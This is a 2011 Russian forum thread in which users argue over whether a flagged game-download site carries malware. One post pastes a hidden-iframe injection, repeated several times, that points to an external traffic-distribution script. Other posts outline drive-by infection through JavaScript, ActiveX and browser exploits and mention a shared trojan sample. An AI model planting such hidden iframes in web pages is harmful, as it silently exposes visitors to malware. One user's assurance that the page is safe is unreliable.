 Антивирусы, Какой лучший? |
 |
 |
Здравствуйте, гость ( Авторизация | Регистрация )
  |
 12th Jan 11 - 18:36
Сообщение
#591
|
|
 forever хренотень Группа: Avril Ru Team Сообщений: 1625 Регистрация: 22-Oct 09 Сообщения понравились: 7 раз  |
Человек_32, у меня нод сразу тревогу забил
|
 |
 
|
|
12th Jan 11 - 18:54
Сообщение
#592
|
|
 True Bat Группа: Members Сообщений: 2346 Регистрация: 6-Dec 09 Сообщения понравились: 2 раза |
avrilo4kagirl, ииии? ©
Я ни нашёл ничего кроме Код <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> <iframe src="http://kindpeople.ru/paneltds/in.cgi?20" style="display:none"></iframe> Мы видим только страницу в интернете, никакого вредоносного кода, я даже туда бегал. Некоторые антивирусы на это жалуются либо по ошибке, либо по делу, что уже в прошлом. |
|
|
|
|
12th Jan 11 - 18:58
Сообщение
#593
|
|
|
forever хренотень Группа: Avril Ru Team Сообщений: 1625 Регистрация: 22-Oct 09 Сообщения понравились: 7 раз |
и тут тоже не вирус, да?
|
|
|
|
|
12th Jan 11 - 19:01
Сообщение
#594
|
|
|
True Bat Группа: Members Сообщений: 2346 Регистрация: 6-Dec 09 Сообщения понравились: 2 раза |
avrilo4kagirl, Видимо, нет. Эту игра у мя есть, недавно обсуждали в теме, спасибо за ссылку
|
|
|
|
|
12th Jan 11 - 19:25
Сообщение
#595
|
|
|
forever хренотень Группа: Avril Ru Team Сообщений: 1625 Регистрация: 22-Oct 09 Сообщения понравились: 7 раз |
ZombieO_o, если че то там троян
ОФФТОП: ааа, моя любимая игруха 
|
|
|
|
|
12th Jan 11 - 19:46
Сообщение
#596
|
|
|
True Bat Группа: Members Сообщений: 2346 Регистрация: 6-Dec 09 Сообщения понравились: 2 раза |
avrilo4kagirl, А где именно?
 На странице тока картинка, текст и ссылки. Троян - это программа (обычно exe), маскирующаяся под что-то полезное, но при открытии сайта ничего подобного не открывается  P.S. Возможно, сайт был просто внесён в чёрный список правообладателями, т.к. распространяет платную программу (игру)? Либо даже чит-коды к ней - уже причина для бана
Сообщение отредактировал ZombieO_o - 12th Jan 11 - 19:51 |
|
|
|
|
12th Jan 11 - 19:49
Сообщение
#597
|
|
|
forever хренотень Группа: Avril Ru Team Сообщений: 1625 Регистрация: 22-Oct 09 Сообщения понравились: 7 раз |
ZombieO_o,
|
|
|
|
|
12th Jan 11 - 20:13
Сообщение
#598
|
|
|
True Bat Группа: Members Сообщений: 2346 Регистрация: 6-Dec 09 Сообщения понравились: 2 раза |
avrilo4kagirl, Я смотрел исходник этой страницы 2 раза. Только картинки, текст и ссылки.
Ошибки случаются. Вот скачал 1 исполняемый файл оттуда, и Comodo жалуется на то, что файл просто упакован неизвестным ему способом. Это ни о чём. Сам сайт рабочий, я не понимаю, как он попал в чёрный список, хотя, вот что у него ftp не работает, стоило бы
|
|
|
|
|
12th Jan 11 - 20:20
Сообщение
#599
|
|
|
forever хренотень Группа: Avril Ru Team Сообщений: 1625 Регистрация: 22-Oct 09 Сообщения понравились: 7 раз |
однако в files.drakan.ru (там уровни есть) ) свободно заходит
|
|
|
|
|
12th Jan 11 - 23:01
Сообщение
#600
|
|
 Cat Empire Группа: Members Сообщений: 7684 Регистрация: 4-Jan 11 Сообщения понравились: 20 раз Откуда: Spb Награды:   |
ZombieO_o, ты лол. я тебе показал как это всё работает а ты даже и не понял XD
вместо ссылки на "только страницу в интернете" может сидеть джава-апплет который грузит с удалённого сервера тело вируса тебе в кэш и тут же запускается виртуальной джава машиной. как результат ты получаешь порно-баннер во весь рост. госсподи, ну не тупи. |
|
|
|
|
13th Jan 11 - 07:02
Сообщение
#601
|
|
|
True Bat Группа: Members Сообщений: 2346 Регистрация: 6-Dec 09 Сообщения понравились: 2 раза |
Человек_32, Это ты не понял.
Ссылка бы так и пропала во временных файлах оперы если бы антивирус не нашёл тот файл, а я не ввёл адрес из него в браузере. Плин, хочу порнобаннер 
Сообщение отредактировал ZombieO_o - 13th Jan 11 - 07:04 |
|
|
|
|
13th Jan 11 - 15:18
Сообщение
#602
|
|
|
Cat Empire Группа: Members Сообщений: 7684 Регистрация: 4-Jan 11 Сообщения понравились: 20 раз Откуда: Spb Награды: |
ZombieO_o, какой ты тугой блин. в код сайта вставляется javascript который например скачивает с удалённого сервера тело вируса и сохраняет его на ПК жертвы по средствам ActiveX. далее скрипт обращается к объекту ActiveX и запускает уже сам вирус.
вот пример такого вируса который пытался проникнуть ко мне именно таким путём. пароль к архиву: 123 |
|
|
|
|
13th Jan 11 - 17:30
Сообщение
#603
|
|
|
True Bat Группа: Members Сообщений: 2346 Регистрация: 6-Dec 09 Сообщения понравились: 2 раза |
Человек_32, Ты просто .exe троян выложил.
Какой смысл говорить про java и activex тогда? На его месте мог быть любой другой файл. Скажи, ты этот файл нашёл у себя на компе или просто скачал откуда-то? |
|
|
|
|
14th Jan 11 - 13:29
Сообщение
#604
|
|
|
Cat Empire Группа: Members Сообщений: 7684 Регистрация: 4-Jan 11 Сообщения понравились: 20 раз Откуда: Spb Награды: |
ZombieO_o, я рассказал тебе про то, как вирус попадает и самозапускается на ПК без участия пользователя, т.е. без запуска исполняемого файла. ты говорил что это невозможно. так же ты просил пример порнобаннера, я тебе его и предоставил.
как было у меня - через эксплойт в опере пролез скрипт который скачал и запустил этот троян, он тут же прописался в шелл. я нашёл у себя в папке кэша оперы. ну или это был эксплойт флеша. у меня не сохранилось прямой ссылки Сообщение отредактировал Человек_32 - 14th Jan 11 - 13:30 |
|
|
|
|
16th Jan 11 - 14:38
Сообщение
#605
|
|
|
True Bat Группа: Members Сообщений: 2346 Регистрация: 6-Dec 09 Сообщения понравились: 2 раза |
Человек_32, Рассказать не значит доказать.
Вообще, какие программы могут запускать исполняемые файлы? Opera и Flash, кажется, нет. И потом, у Винды кроме запрета на запуск программы с администраторскими правами существует защита, а так же, DEP. Цитата так же ты просил пример порнобаннера, я тебе его и предоставил. Лан, потестим Смотри если у меня комп упадёт, а порнобаннер я не увижу  Цитата без запуска исполняемого файла. ты говорил что это невозможно Относительно. Просто открыв архив с исполняемыми заражёнными файлами и скопировав содержимое на диск, это невозможно. Угроза запуска вируса во время путешествий в интернете и открытия других документов специализированными программами просмотра в принципе существует. Цитата он тут же прописался в шелл Меню винды?  Цитата я нашёл у себя в папке кэша оперы. Кэш оперы ни как не работает. Только если ты посетишь ту же страницу снова, она загрузится быстрее 
|
|
|
|
|
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0
| Текстовая версия | Сейчас: 20th Sep 25 - 07:58 |